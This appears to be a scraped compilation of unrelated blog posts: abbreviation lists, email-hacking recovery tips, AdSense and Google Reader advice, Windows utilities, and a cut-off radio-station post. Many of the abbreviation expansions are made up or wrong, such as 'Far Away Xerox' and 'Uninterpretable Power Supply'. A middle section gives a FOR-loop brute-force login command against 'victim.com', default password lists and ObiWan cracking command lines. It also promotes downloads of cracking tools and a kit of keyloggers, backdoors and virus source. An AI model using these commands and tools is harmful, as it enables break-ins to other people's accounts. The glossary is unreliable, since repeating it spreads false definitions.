Abbreviations associated with Computer

Here are some important abbreviations associated with Computer and web technology. These terms are very basic and general known by many peoples, but aim of sharing here to spread with unaware people.

CDAC : Centre for Development of Advanced Parallel Computing.
C-DOT : Center for Development of Telematrics.
HTTP : Hyper Text Transfer Protocol
ROM : Read Only Memory
RAM : Random Access Memory
BIOS : Basic Input- Output System.
MODEM : Modulation – Demodulation.
CAD : Computer Aided Design.
PSTN : Public Switched Public Data Network.
PSPDN : Pocket Switched Public.
RABAN : Remote Area Business Message Network.
LAN : Local Area Network
WAN : Wide Area Network .
MAN : Metropolitan Area Network.
CDMA : Code Division Multiple Access.
GAIS : Gateway Internet Access Service
E-Mail : Electronic Mail.
CD : Compact Disc.
LDU : Liquid Display Unit.
CPU : Central Processing Unit.
CAM : Computer Aided Manufacturing.
CATScan : Computerized Axial Tomography Scan .
COBOL : Common Business Oriented Language.
COMAL : Common Algorithmic Language.
DOS : Disk Operating System.
DTS : Desk Top System
DTP : Desk Top Publishing.
E-Commerce : Electronic Commerce.
ENIAC : Electronic Numerical Integrator And Calculator
FAX : Far Away Xerox.
FLOPS : Floating Operations Per Second.
FORTRAN : Formula Translation.
HLL : High Level Language.
HTML : Hyper Text Markup Language.
IBM : International Business Machine.
IC : Integrated Circuit
ISH : International Super Highway.
LISP : List Processing.
LLL : Low Level Language
MICR : Magnetic Ink Character Recognizer.
MIPS : Millions of Instructions Per Second.
MOPS : Millions of Operations Per Second.
MPU : Micro Processor Unit.
NICNET : National Information Center Network.
OMR : Optical Mark Reader.
PC-DOT : Personal Computer Disk Operation System.
PROM : Programmable Read Only Memory.
SNOBOL : String Oriented Symbolic Language.
UPS : Uninterpretable Power Supply.
VDU : Visual Display Unit.
VLSI : Very Large Scale Integrated.
WWW : World Wide Web.

Some others abbreviations suggested by Mohammed Rafi:

WLAN – Wireless Local Area Network.
Wi-fi – Wireless Fidelity
TIFF – Tagged Image File Format
e-SATA – External Serial Advanced Technology Attachment
WiMAX – Worldwide Interoperability for Microwave Access
JPEG – Joint Photographic Experts Group
GIF – Graphics Interchange Format
ATX – Advanced Technology Extended
UATX – Ultra Advanced Technology Extended
FATX – Flex Advanced Technology Extended
MATX – Micro Advanced Technology Extended
EEATX – Enhanced Extended Advanced Technology Extended
DDR SDRAM – Double-Data-Rate Synchronous Dynamic Random Access Memory
DDR RAM – Double-Data-Rate Random Access Memory
GUI – Graphical User Interfaces
CUI – Command User Interfaces

If you know some other terms and abbreviations relted to computer, you can have a comment on the post so that can be added to the list.

Some Important Abbreviations associated with all categories

A.V.E.S. : Acute Viral Encephalitic Syndrome.

B.C.T.T. : Bank Cash Transaction Tex.

B.C.S.B.I.: Banking Codes and Standard Board Of India.

C.I.C : Central Information Commission.

C.S.T.O : Collective Security Treaty Organisation.

CNLU : Chanakya National Law University .

D.I.I : Domestic Institutional Investor

DTH : Direct To Home

E.C.G.C : Export Credit Guarantee Corporation.

F.D.I : Foreign Direct Investment.

F.I.I : Foreign Institutional Investor.

GUAM : Georgia, Ukraine, Azebaijan and Moldova.

GAGAN : GPS Aided Geo-Augmented Navigation.

I.M.O. : Instant Money Order.

IBSA : India, Brazil, South Africa

M.R.O : Mars Recconnaissance Orbiter.

N.A.D.T : National Authority On Drugs and Therapeutics.

N.C.C.E : National Council for Clinnical Establishments.

N.E.I.A : National Export Insurance Account.

N.M.D.P : National Maritime Development Programme.

N.R.E.G.A : National Rural Employment Guarantee Act.

N.J.C : National Judicial Council.

O.C.I : Overseas Citizen of India.

PURA : Providing Urban Amenities in Rural Areas.

P.H.F.I. : Public Health Foundation of India.

R.L.D.A : Railway Land Development Authority.

SCRAMJET: Supersonic Combustion Ramjet.

SIM : Subscriber Identification Module.

I.T.G.I : IFFCO Tokio General Insurance.

IITF : India International Trade Fair.

IAEA : International Atomic Energy Agency

H.P.A.I : Highly Pathogenic Avian Influenza.

N.C.H : National Consumer Influenze.

S.P.A : Seven Party Alliance.

VAT : Value Added Tex.

QIB : Qualified Institutional Buyer.

QIP : Qualified Institutional Placement.

RTA : Railway Territorial Army.

RTC : Round Table Conference.

RTG : Radio-isotope Thermo-electric Generator.

SWIFT : Society for World-wide International Financial Transactions.

SWOT : Strength, Weakness, Opportunities, Threats.

SYL : Sutlej- Yamuna Link (Canal).

YWCA : Young Women’s Christian Association.

ZSI : Zoological Survey of India.

ZUPO : Zimbabwe United People’s Organisation.

ESOP : Employee Stock Option

PRP : Performance Related Payment

ICA : Irrigated Crop Area

FEMA : Foreign Exchange Management Act

RFID : Radio Frequency Identification

PERDA : Pension Fund Regulatory and Development Authority

RED : Result Framework Document

TERM : Telecom Enforcement, Resource and Monitoring

OGL : Open General Licence

IMB : International Maritime Bureau

What To Do When Your Email Gets Hacked

posted by Suzanne Kantra on November 11, 2011
in Computers and Software, Safety & Support, Tips & How-Tos, Tech 101 :: 4 comments

Yesterday, I got an interesting email from my mother-in-law. The message, rife with grammatical errors, contained a link directing me to a Filipino-registered website with a pitch on how to make money working from home. Was this her way of telling me I should earn more money to support her grandchildren? No, just evidence that her email had been hacked.

When I called my mother-in-law, she already knew about the problem—the hacker's message had gone out to her entire address book—and was very concerned. So I walked her through the steps to get everything back in order.

Step #1 - Change your password

The very first thing you want to do is keep the hacker from getting back into your email account. So change your password, and be sure to use a strong password that is not related to your prior password. I.e., if your last password was "billyjoe1", don't pick "billyjoe2". And if your name is BillyJoe, you shouldn't have been using your name in your password in the first place.

Step #2 - Check you email settings

Sometimes hackers will change your settings to forward a copy of every email you receive to themselves. This way, they can monitor future emails that may contain login information for other sites. So check your mail forwarding settings to ensure no unexpected email addresses have been added.

Second, check your email signature to see if the hacker added a spammy signature that will continue to peddle their dubious wares even after they've been locked out.

Step #3 - Scan your computer for malware

Run a full scan with your anti-malware program. You do have an anti-malware program on your computer, right? If not, download the free version of Malwarebytes and run a full scan with it. I recommend running Malwarebytes even if you already have another anti-malware program. If the problem is malware, your original program obviously didn't stop it. And Malwarebytes has resolved problems for me that even Symantec's Norton Internet Security wasn't able to resolve. Scan other computers you log in from, such as your work computer, as well.

If malware is detected, fix it (obviously) and then go back and change your email password again (since when you changed it in step #1, the malware was still on your computer.).

Step #4 - Find out what else is compromised

My mother-in-law followed the ill-advised practice of storing usernames and passwords for her various accounts in an email folder called "sign-ups". So once the hacker was into her email, he could easily discover numerous other logins. But most of us have emails buried somewhere with this type of information. Do a search for "password" in your mailbox to figure out what other accounts you may have that could have been compromised. Change these passwords immediately and, god forbid, they are your bank, credit card or other critical accounts, check your statements to make sure there are no suspicious transactions.

It's also a good idea to change any other accounts that use the same user name and password as your compromised email. Spammers are savvy enough to know that most people reuse passwords for multiple accounts, so they may try your login info in other email applications, PayPal and other common sites.

Step #5 - Humbly beg forgiveness of your friends

Let the folks in your contact list know that your email was hacked and that they should not open any suspicious emails or click on any links in the email(s) that were recently sent from you. Most will probably have already figured out that you were not really the one recommending they buy their Viagra from an online pharmacy in India, but you know, everyone has one or two friends who are a little slower to pick up on these things.

Setp #6 - Stop it from happening again

While malware on your computer is one way your login information could be stolen, it is certainly not the only way. Many cases are due to carelessness with creating or protecting your login information.

In 2009, hackers stole and posted on the Internet 32 million passwords from a website called RockYou.com. An analysis of the data by security researchers showed that 20% used one of 5,000 common passwords, with 1% using "123456". Easy passwords make for easy hacking, as spammers have programs that can cycle through thousands of logins a second to identify weak accounts.

Picking a strong password is your best protection from this type of hacking. It also is prudent to use different passwords for each site. Or, at the very least, use a unique password for your email account that no other account uses. Likewise, for banking or other high-security accounts. If you're concerned about keeping track of the passwords, there are password management programs that can do the work for you.

In my mother-in-law's case, her passwords were pretty good and there was no malware on her computer. But she was careless about where she was logging in. On her trip to Morocco over the summer, she didn't want to lug a computer around. Instead, she used the computer in her hotel lobby to check her email.

That was a bad idea. Computers in hotel lobbies, libraries and other public places are perfect locations for hackers to install key-logging programs. The computers are often poorly secured and are used by dozens of people a day who don't think twice about logging into their email or bank account, or entering credit card information to make a purchase. The best advice is to assume that any public computer is compromised and proceed accordingly.

Life is not about counting the Years

it's about making the years Count.

3 Best Tips before you do Google Searching again

Google queries are not case sensitive: Google doesn’t care if you type your query in lowercase letters (hackers), uppercase (HACKERS), camel case (hAcKeR), or psycho-case (haCKeR)—the word is always regarded the same way.This is especially important when you’researching things like source code listings, when the case of the term carries a great deal of meaning for the programmer.The one notable exception is the word or. When used as the Boolean operator, or must be written in uppercase, as OR.

Google wildcards: Google’s concept of wildcards is not the same as a programmer’s concept of wildcards. Most consider wildcards to be either a symbolic representation of any single letter (UNIX fans may think of the question mark) or any series of letters represented by an asterisk. This type of technique is called stemming. Google’s wildcard, the asterisk

(*), represents nothing more than a single word in a search phrase. Using an asterisk at the beginning or end of a word will not provide you any more hits than using the word by itself.

Google reserves the right to ignore you: Google ignores certain common words, characters, and single digits in a search.These are sometimes called stop words. When Google ignores any of your search terms, you will be notified on the results page, just below the query box. Some common stop words include who, where, what, the, a, or an. Curiously enough, the logic for word exclusion can vary from search to search.

Don’t Get Caught With Google Adsense Click Fraud

Don’t Get Caught With Google Adsense Click Fraud

Considering the money to be made with Adsense, it is no wonder that they would want to get back into it.

It is that same consideration why the Google Adsense click fraud is thought of and why many people are getting into it.

Click fraud is the act of clicking on ads for the purpose of costing the advertiser money. It is simply the same as paying out cash for false leads. Many people website owners are aware of this fraud and are sharing the same sentiment that this is the one big problem that Adsense is facing.

How do you prevent being involved in this fraud?

Majority of web hosts are offering access logs. Once this is offered to you, it is necessary that you hand it over to Google as well. This allows them to look for any suspicious activity on your site. Problems like this are very serious and giving it to them is saying that you would want to help them in any way you can in solving the problem.

It can also help if you have a click monitoring software. If you do not have one yet, you should try and get one. There is absolutely no major factor preventing you from having one because most of this software is free.

As usual, all the information you have received should be turned over to Google. This is showing Google that you too are fighting against click frauds and is in no way a part of it.

Study your server logs and watch for any activity that seems suspicious. Report anything that you may find odd, may it big or small thing.

You may want to consider disabling ads for your own IP address and local geographic area. This will certainly prevent accidents and will not make Google mistake another user as you. You can do through a htaccess file. This will avoid Google mistaking as clicking on your own ads and be kicked out because of it.

Keep your Adsense off on pop ups and pop unders.

Your ads should not be displayed on content sites that promote illegal activity or tampering of the legal rights of other people or business. Included in this are the content that is considered adult and gambling ones. If you think that you may be breaking this rule, immediately remove your content or Adsense from the web page.

Be truthful and confess up to Google about times when you might have clicked on your own as, whether accidentally or intentionally. Or the times when you have done something that is against the Terms of Service that they are implementing. Be honest about anything that you may have done that is wrong. Confessing is way better than Google learning about it eventually. It would mean eventual termination and no getting back what you have worked so hard for.

Do not tell your family or friends about Adsense on your website. Chances are they may start clicking on them to help you make money without you knowing it. They may be doing more harm to you than help by trying it in the first place.

If ever someone you know chanced upon your Adsense, make sure they understand that they cannot click on your ads under any circumstances. It would be wise to brief them on important things about Adsense and what not to do with them.

Most pay per click networks have different measures in hand to protect website owners against click frauds. Other search engines can track more than 50 data points, IP address, browser’s information, users session info and pattern recognition. They also have ’systems’ available that detects fraud. Not to mention the specialized teams monitoring how things are going and helping advertisers stop click frauds.

Google offers suggestion on how to avoid click fraud. Using ‘negative keywords’ can be used to keep your Adsense showing on products and services that are in no way related to yours. Adding tracking URLs to your links so you can track the traffic coming from Google.

Do not be caught in the Google click fraud. Be aware and be wary.

50+ Google Reader Productivity Hacks

50+ Google Reader Productivity Hacks

Google Reader is already a tool that can be used to boost your productivity throughout the day by letting you view your favorite blog’s feeds and posts in one spot: through your Google account. But for those of us who tend to get bogged down in a lot of useless subscriptions and really need to cut down on the minutes (or hours) we spend procrastinating each day, there are a lot of little hacks to make Google Reader more productive. We’ve compiled a list of over 50 of our favorites here.

Keyboard Shortcuts

Use these basic but necessary keyboard shortcuts to make searching, organizing, sharing and reading your feeds more efficient.

1. /: Use the forward slash to move your cursor to the search box and start looking for new stuff or saved items.
2. g then u: Type g then u to go to your subscriptions.
3. g then d: This shortcut will take you to the recommended page. If there are no recommendations, typing g then d will take you to the browse page.
4. 2: Press 2 to see your subscriptions in a list view or headline view.
5. ?: Find more keyboard shortcuts just for Google Reader by pressing the question mark.
6. Shift-s: Pressing Shift-S will share or un-share the selected item.
7. s: Star and un-star your highlighted items simply by pressing s.
8. Shift-o: Open up the highlighted subscription or folder with this shortcut.
9. g then h: Press g then h to go back to the Google Reader homepage.
10. g then shift-s: This shortcut will take you to the “Your Shared Items” page.
11. shift-n/p: n/p stands for Next/Previous, and using this combination will select the Next/Previous selection or folder.
12. v: Open up the original page of the selected item in Google Reader.
13. e: Quickly e-mail a page or other selection by pressing e when you’re in Google Reader.
14. r: Check to see if anymore unread updates have been added when you hit the r button in the navigation.

For Firefox

Firefox users like their browser’s speed and ability to add on new scripts or buttons. Check out several Google Reader-specific hacks for Firefox here.

1. Enhance Google Reader Preview: This script adds a Preview button so that you don’t have to open up an article or post all the way to read it.
2. BlogThis2Me: The BlogThis2Me script lets you “blog Google Reader’s “BlogThis!” to your own blog system, not to blogger.com,” as long as you have Firefox and Greasemonkey.
3. Smart Google Reader Subscribe Button: this script “adds an overlayed check icon when you’re subscribed to at least one of the feeds that the site advertises via auto-discovery.”
4. Gbutts 1.5.1: Gbutts is short for Google buttons, and you can add your Google Reader button, as well as any other Google buttons, to your Firefox address bar.
5. Better GReader: Better GReader works with Firefox adds a menu with extra options and features like Smart Subscribe, Preview Inline, Optimized Skin and others.
6. Google Reader Watcher: Google Reader Watcher is an add-on that makes Firefox check your Google Reader for unread fees. This download does not require Greasemonkey.
7. Quick Hide Message: Shave off milliseconds with this script, which “quickly hides the message displayed in Google Reader after performing renames, folder changes,” and other actions.
8. Auto Add Feed: The Auto Add Feed script only adds feeds to Google Reader, instead of asking you where you want it to be saved.
9. Title Unread Count: This hack moves the unread count in Google Reader to the front.
10. Greasereader: Add even more hot keys to your Google Reader systems by reading this guide.
11. Google Reader All Starred: Extract all of your starred items as links from Google Reader so that you don’t have to download each one.
12. Google Reader Read by Mouse: Set up this script so that you can use a mouse-only system to read your feeds. It uses mouse buttons for the following actions: next item, previous item, and more.

Real Time Savers

If you’re serious about making your Google Reader visits more efficient, learn how to categorize by priority, use the “next” bookmarklet, and implement scripts that let you autoscroll, review your subscriptions and more.

1. Categorize by priority: Stepcase Lifehack recommends categorizing your feeds by priority so that you don’t get bogged down in irrelevant articles.
2. Google Reader Autoscroll: The autoscroll script lets you “view and mark items as read by means of a mouse wheel and keyboard shortcuts.”
3. Mark All as Read: If you only want to read one article from a feed, you can mark everything else as read to weed out your extra entries.
4. Google Reader Scroll Reducer: With this script, you’re able to comment on and view the original site without having to scroll to the top of page to get to the URL.
5. The “Next” Bookmarklet: The Google Reader Blog discusses this hack, which “allows you to use Google Reader through just one link — clicking on it takes your browser to the next unread item in your reading list.”
6. Review your subscriptions: Are you still getting subscriptions for some obscure hobby you were only interested in a year ago? Go through your subscriptions and delete any that you don’t really want emptied into your account regularly.
7. Print Button v2.0: The Google Reader Print Button v2.0 allows users to print either the selected content or everything that’s displayed on the page in Google Reader.
8. Gmail + Google Reader: Add Google Reader into your Gmail account so you don’t have to constantly switch back and forth.
9. Google Reader Filter: Get rid of duplicate and unwanted content with this script.
10. Tag your items: Take advantage of the tagging feature on Google Reader. It’s there to help you stay organized and more productive.

Social Media Hacks

How much time do you waste each day checking all of your social media accounts? These hacks let you sync up Google Reader with Facebook, Twitter, Tumblr, Google Chat and more.

1. Google Reader + ma.gnolia: This basic script lets you add a Google Reader post to ma.gnolia.
2. Google Reader Digg News: Add a Digg button to your Google Reader posts with this script.
3. Tumblr: Sync up your Google Reader and Tumblr with this script. You can attach your reblog button or Share-on-Tumblr at the bottom of articles on Google Reader.
4. Managing Your Shared Items: This post from the Google Reader Blog shows you how to add and remove friends from your Gmail or GChat account.
5. Google Reader and Flickr: Now you embed Flickr videos into your Google Reader, so you don’t have to switch back and forth to share with extra friends or read their comments.
6. Facebook Sharer + Google Reader: Share your favorite posts and articles with Google Reader friends and Facebook friends.
7. Google Reader + del.icio.us: Use this script to define tags and links for a faster way of posting to del.icio.us.
8. Google Reader + Twitter: Use this script to add reader posts to Twitter.

Add-Ons and Solutions

Try out these add-ons to customize your Google Reader experience and streamline your Google accounts.

1. Google Reader Notifier: This extension keeps you updated by showing you how many unread items you have in your account.
2. Add a Search: Add a search engine to your Google Reader account to make searching for items faster.
3. Google Reader Optimized: Use this script to view Google Reader in a larger space. The last official update was in 2006, but Google Reader users have submitted updates.
4. Google Reader Romeo Script: Check out this script to access Google Reader from your cell phone — if you don’t have an iPhone.
5. Google Reader Button for Internet Explorer: IE users can add on a Google Reader to their browser using this tutorial.
6. iPhone Skin: iPhone users can easily view Google Reader on their phones with this special skin from developer David Cann.
7. Iris: View your Google Reader subscriptions in a Firefox sidebar.
8. Go behind the scenes: If you want to know how many people have subscribed to a certain feed, you can use this tutorial to speed up your search times.

Recover Email Password using SMS

First of all..I would like to say that Gmail is out of Beta..yep..After a long time when they have integrated the best of world in their email system,it was the right time to rip off the tag,and they did it.Further,with the world going mobile,they took some of the steps to better enhance the security even a notch above than other email services. It helps to know that even the best of us forget our passwords from time to time and In fact,the sheer amount of people visit Gmail help center everyday just to recover their passwords. To help with these situations, Google went a step ahead by adding the ability to recover your password via text message.

In order to access this feature,sign in to your account and select ' Change Password Recovery Options ' enter your cell phone number and click ' Save '
The Next time you forget your password, enter your username on the password-assistance page, and Google will text you a recovery code. No need to check another email account or even leave the page.
In general, it's a good idea to add as many password recovery options to your Google Account as possible, like a secondary email address and security question. And don't forget to keep them up-to-date.
Afterall,we all make mistakes :P

Cheers and Keep Learning

Manual Password Cracking Algorithm

Manual Password Cracking Algorithm

• Find a valid user

• Create a list of possible passwords

• Rank the passwords from high probability to low

• Key in each password

• If the system allows you in - Success

• Else try till success

In its simplest form, password cracking can be automated using a simple FOR loop. In the example below, an attacker creates a simple text file with usernames and passwords that are iterated using the FOR loop.

A text file is created to serve as a dictionary from which the main FOR loop will draw usernames and passwords as it iterates through each line:

[file: credentials.txt] administrator "" 

administrator password 

administrator administrator 

[Etc.] 

From a directory that can access the text file the following command is typed:

c:\>FOR /F "tokens=1,2*" %i in (credentials.txt)^

More? do net use \\victim.com\IPC$ %j /u:victim.com\%i^ 

More? 2 >> nul^ 

More? && echo %time% %date% >> outfile.txt^ 

More? && echo \\victim.com acct: %i pass: %j >> outfile.txt 

c:\>type outfile.txt 

If there has been a successfully guessed username and  password from credentials.txt, outfile.txt will exist and contain the correct  user name and password. The attacker's system will also have an open session  with the victim server.

---

Password Guessing

Password guessing attacks can be carried out manually or via automated tools.

Password guessing can be performed against all types of Web Authentication

The common passwords used are:

root, administrator, admin, operator, demo, test, webmaster, backup, guest, trial, member, private, beta, [company_name] or [known_username]

Passwords are the principal means of authenticating users on the Web today. It is imperative that any Web site guard the passwords of its users carefully. This is especially important since users, when faced with many Web sites requiring passwords; tend to reuse passwords across sites. Compromise of a password completely compromises a user.

Attack Methods

Often Web sites advise users to choose memorable passwords such as birthdays, names of friends or family, or social security numbers. This is extremely poor advice, as such passwords are easily guessed by an attacker who knows the user. The most common way an attacker will try to obtain a password is through the dictionary attack'. In a dictionary attack, the attacker takes a dictionary of words and names, and tries each one to see if it is the require password. This can be automated with programs which can guess hundreds or thousands of words per second. This makes it easy for attackers to try variations: word backwards, different capitalization, adding a digit to the end, and popular passwords.

Another well-known form of attack is the hybrid attack. A hybrid attack will add numbers or symbols to the filename to successfully crack a password. Often people change their passwords by simply adding a number to the end of their current password. The pattern usually takes this form: first month password is "site"; second month password is "site2"; third month password is "site2"; and so on. A brute force attack is the most comprehensive form of attack, though it may often take a long time to work depending on the complexity of the password. Some brute force attacks can take a week depending on the complexity of the password.

Hacking Tool: WebCracker

• WebCracker is a simple tool that takes text lists of usernames and passwords and uses them as dictionaries to implement Basic authentication password guessing.
  
• lt keys on "HTTP 302 Object Moved" response to indicate successful guess.
  
• lt will find all successful guesses given in a username/password.
  

Webcracker allows the user to test a restricted-access website by testing id and password combinations on the web site.This program exploits a rather large hole in web site authentication methods. Password protected websites may be easily brute-force hacked, if there is no set limit on the number of times an incorrect password or User ID can be tried.WebCracker is a simple tool that takes text lists of usernames and passwords and uses them as dictionaries to implement Basic authentication password guessing.

• It keys on "HTTP 302 Object Moved" response to indicate successful guess.
  
• It will find all successful username/password given in the list.
  

Hacking Tool: Brutus

http://www.hoobie.net/brutus/

• Brutus is a generic password guessing tool that cracks various authentication.
  
• Brutus can perform both dictionary attacks and brute-force attacks where passwords are randomly generated from a given character.
  
• Brutus can crack the following authentication types:
  
• HTTP (Basic authentication, HTML Form/CGI); POP3; FTP; SMB; Telnet
  
  
  

Brutus is an online or remote password cracker. More specifically it is a remote interactive authentication agent. Brutus is used to recover valid access tokens (usually a username and password) for a given target system. Examples of a supported target system might be an FTP server, a password protected web page, a router console a POP3 server etc. It is used primarily in two ways: To obtain the valid access tokens for a particular user on a particular target. To obtain any valid access tokens on a particular target where only target penetration is required.

Brutus does very weak target verification before starting; in fact all it does is connect to the target on the specified port. In the context of Brutus, the target usually provides a service that allows a remote client to authenticate against the target using client supplied credentials. The user can define the form structure to Brutus of any given HTML form. This will include the various form fields, any cookies to be submitted in requests, the HTTP referrer field to send (if any) and of course the authentication response strings that Brutus uses to determine the outcome of an authentication attempt.

If Brutus can successfully read forms of the fetched HTML page then each form will be interpreted and the relevant fields for each form will be displayed. Any cookies received during the request will also be logged here. Brutus handles each authentication attempt as a series of stages, as each stage is completed the authentication attempt is progressed until either a positive or negative authentication result is returned at which point Brutus can either disconnect and retry or loop back to some stage within the authentication sequence.

Hacking Tool: ObiWan

http://www.phenoelit.de/obiwan/docu.html

• ObiWan is a powerful Web password cracking tool. It can work through a proxy.
  
• ObiWan uses wordlists and alternations of numeric or alpha-numeric characters as possible as passwords.
  
• Since Webservers allow unlimited requests it is a question of time and bandwidth to break into a server system.
  

ObiWaN stands for "Operation burning insecure Web server against Netscape". It is called Project 2086 now, after 2068 the number of the RFC which describes the HTTP/1.1 protocol. 11.1 is the section which describes the basic authentication scheme. This is the mostly used authentication scheme for web server and used by ObiWaN.

Web servers with simple challenge-response authentication mechanism mostly have no switches to set up intruder lockout or delay timings for wrong passwords. Every user with a HTTP connection to a host with basic authentication can try username-password combinations as long as he/she like it. This allows the attacker to prod the system as long as he wants to.

Like other programs for UNIX system passwords (crack) or NT passwords (lophtcrack) ObiWaN uses wordlists and alternations of numeric or alpha-numeric characters as possible passwords. Since web servers allow unlimited requests it is a question of time and bandwidth to break in a server system. The first way is to run ObiWaN more than once. The following example tries to crack username eccouncil on the intranet.

./ObiWaN -h intranet -a eccouncil -w list.txt 

To run it with alphanumeric variation with a depth of 2

./ObiWaN -h intranet -a eccouncil -w list.txt -A 2 

To run it in brute force loop mode

./ObiWaN -h intranet -a eccouncil -w list.txt -b 6 -B 8 

Hacking Tool: Munga Bunga

Munga Bunga's HTTP Brute Forcer is a utility utilizing the HTTP protocol to brute force into any login mechanism/system that requires a username and password, on a web page (or HTML form). To recap - A password usually only contains letters. In such a case the quantity of characters in a charset is 26 or 52, depending on usage of registers - both of them or just one. Some systems (Windows, for example) don't make any difference between lower-case and uppercase letters. With an 8-characters' long password the difference would amount to 256 times, which is really significant.

Brute force method can sometimes be very effective when it is combined with the functionality of the program. Munga Bunga is a tool which can be used for breaking into emails, affiliate programs, web sites, any web based accounts, launching DoS attacks, flooding emails, flooding forms, flooding databases and much more; though DoS attacks and flooding activity are not supported or documented in the documentation. Apart from this, the attacker can write definition files. These are files ending in the .def extension, and contain information about a particular server, and the data to submit to it. They are used to extend the power and capability of the program, based on the user's own definitions. The software comes bundled with some definition

The tool claims to be capable of brute forcing, any thing that can be entered via a HTML form with a password and username. The attack methodology goes as follows: The attacker uses a password file in order for the program to attempt and enter the account(s), with the specified passwords. In addition, he can write a definition file for the form he wants to crack into.

Hacking Tool: PassList

Passlist is another character based password generator.

Passlist is a character based password generator that implements a small routine which automates the task of creating a "passlist.txt" file for any brute force tool. The program does not require much information to work. The tool allows the user to specify the generation of passwords based on any given parameter. For instance, if the user knows that the target system's password starts with a particular phrase or number, he can specify this. This makes the list more meaningful to the user and easier for the brute forcer. He can also specify the length required such as the maximum number of random characters per password, apart from the maximum number of random

A partial list is given below.

• Refiner is used to generate a wordlist containing all possible combinations of a partial password, which an attacker may have obtained by other means. Refiner will then generate a text file containing all possible combinations.
  
• WeirdWordz allows the user to just select an input file and as an output file, makes all sorts of combinations of the lines/words in the input file.
  
• Raptor 1.4.6 - creates words using many different filters from html files to create a wordlist.
  
• PASS-PARSE V1.2 - Pass-parse will take any file and turn all the words into a standard type password list, while stripping anything that's not alphanumeric. The main idea behind it is that while trying to crack the password of a personal website, the password may appear on the site when the person describes their interests. This will parse through an html file and create a list of words from that page to try as passwords.

PDF Password Cracker: Download PDF Password Remover

The PDF Password Remover can be used to decrypt protected Adobe Acrobat PDF file

The PDF Password Remover is a useful and reliable software which can be used to decrypt protected Adobe Acrobat PDF files, which have "owner" password set, preventing the file from editing (changing), printing, selecting text and graphics.

Decryption is being done instantly. Decrypted file can be opened in any PDF viewer (e.g. Adobe Acrobat Reader) without any restrictions -- i.e. with edit/copy/print functions enabled. All versions of Adobe Acrobat (including 7.x, which features 128-bit encryption) are supported.

The standard security provided by PDF consists of two different methods and two different passwords, 'user password' and 'owner password'.

A PDF document may be protected by password for opening ('user' password) and the document may also specify operations that should be restricted even when the document is decrypted: printing; copying text and graphics out of the document; modifying the document; and adding or modifying text notes and AcroForm fields (using 'owner' password).

Limitation:

Please note that PDF Password Remover doesn't work with documents which have 'user' password (preventing the files from being opened), if both user and owner passwords are unknown the PDF Password Remover will fail.

Here are some key features of "PDF Password Remover":

• Easy to use
• Supports drag and drop PDF files
• Do NOT need Adobe Acrobat software
• Remove the security settings from your encrypted PDF file is instant
• Supports command line operation (for manual use or inclusion in scripts)
• Supports PDF1.6 protocol (formerly only supported by Acrobat 7.0 application)
• Supports PDF1.6 (Acrobat 7.x) files, including 40-bit RC4 decryption, 128-bit RC4 decryption, compressed files and unencrypted metadata
• Batch operation on many files from command line
• Supports Adobe Standard 40-bit Encryption and Adobe Advanced 128-bit Encryption
• Decrypts protected Adobe Acrobat PDF files, removing restrictions on printing, editing, copying

DOWNLOAD HERE

Download Ultimate Crackers Kit | Best Hacker Toolbox

Download Ultimate Crackers Kit | Best Hacker Toolbox

Hacker Toolbox consists of the latest hacking tools. A profusion of hacking, cracking, phreaking tools & files will familiarize you with how hackers break into your machine and steal your information. You can also learn hacking

Techniques from a good collection of source codes for virus and tools, instructional documentation, tutorials and much more. You can act like a master hacker to customize your own program with the editors and executable file tools.

Categories: Backdoor, Crack tool, Disassembler, DoS tool, Document, E-mail tool, Editor, Encryption & decryption tool, Executable file tool, Icq tool, Keylogger, MISC, Packet forging, Phreak tool, Scanner, Sniffer, Snoop tool, Source

code, Spoof, Virus.

DOWNLOAD

25 Windows Hidden Tools You Seldom Use

Are you a Windows XP User ? How many utilities do you know that is built-in Windows XP ? Notepad, Wordpad, Character Map, Calculator, Microsoft Paint, these are the few utilities that I usually use.But out of blue,Windows Xp is a fully loaded package which has a lot of apparently hidden utilities which are seldom accessed by a basic or normal computer users ; and trust me,they still pack a lot of punch.

To run any of these apps go to Start > Run and type the executable name (i.e. charmap) and press Enter.

Character Map (charmap.exe) - Very useful for finding unusual characters.

Disk Cleanup (cleanmgr.exe) – The usual Disc cleanup.

Clipboard Viewer (clipbrd.exe) - Views contents of Windows clipboard.

Dr Watson (drwtsn32.exe) - Troubleshooting tool,runs when windows crashes.

DirectX diagnosis (dxdiag.exe) - Diagnose & test DirectX, video & sound cards.

Private character editor (eudcedit.exe) - Allows creation or modification of characters.

IExpress Wizard (iexpress.exe) - Create self-extracting / self-installing package.

Microsoft Synchronization Manager (mobsync.exe) - Appears to allow synchronization of files on the network for when working offline. Apparently undocumented.

Windows Media Player 5.1(mplay32.exe) - Retro version of Media Player, very basic.

ODBC Data Source Administrator (odbcad32.exe) – Database connection utility for support with external servers,create ODBC data sources,to administer remote databases or for supporting the ODBC database utility in Visual basic language.

Object Packager (packager.exe) - To do with packaging objects for insertion in files, appears to have comprehensive help files.

System Monitor (perfmon.exe) - Very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for budding uber-geeks only.

Program Manager (progman.exe) - Legacy Windows 3.x desktop shell.

Remote Access phone book (rasphone.exe) - Documentation is virtually non-existent.

Registry Editor (regedt32.exe or regedit.exe) – For making custom changes or hacking the Windows Registry.

Network shared folder wizard (shrpubw.exe) - Creates shared folders on network.

File signature verification tool (sigverif.exe) - This tool will search the operating system and identify any unsigned device drivers installed on the system. It will also verify all signed device drivers.

Volume Control (sndvol32.exe) - I've included this for those people that lose it from the System Notification area.

System Configuration Editor (sysedit.exe) - Modify System.ini & Win.ini just like in Win98! .

Syskey (syskey.exe) - Secures XP Account database, use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications.

Microsoft Telnet Client (telnet.exe) – Built in telnet client which can be used to connect to servers to sent emails or to hack :) This is disabled in in vista but you can re-enable it by going to

Control panel –> Programs and Features –> Click "Turn Windows features on or off" on left –> Scroll down and check "Telnet Client.

Driver Verifier Manager (verifier.exe) - Seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented.

Windows for Workgroups Chat (winchat.exe) - Appears to be an old NT utility to allow chat sessions over a LAN, help files available.

System configuration (msconfig.exe) - Can use to control startup programs,make changes to startup of XP.

Group Policy Editor (gpedit.msc) - Used to manage group policies, and permissions.Its an Administrator only tool.

I hope it was informative.I would like to hear your comments on the above topic.

Cheers and keep learning.

How To Make Your Own Radio station

Love to listen to internet radio ? Have a great collection of music ? Wanna be a DJ ? or just wanna make others experience your great collection of music ? lets get it going..and get ready to rap,roll and obviously broadcast…

Here is what you need -

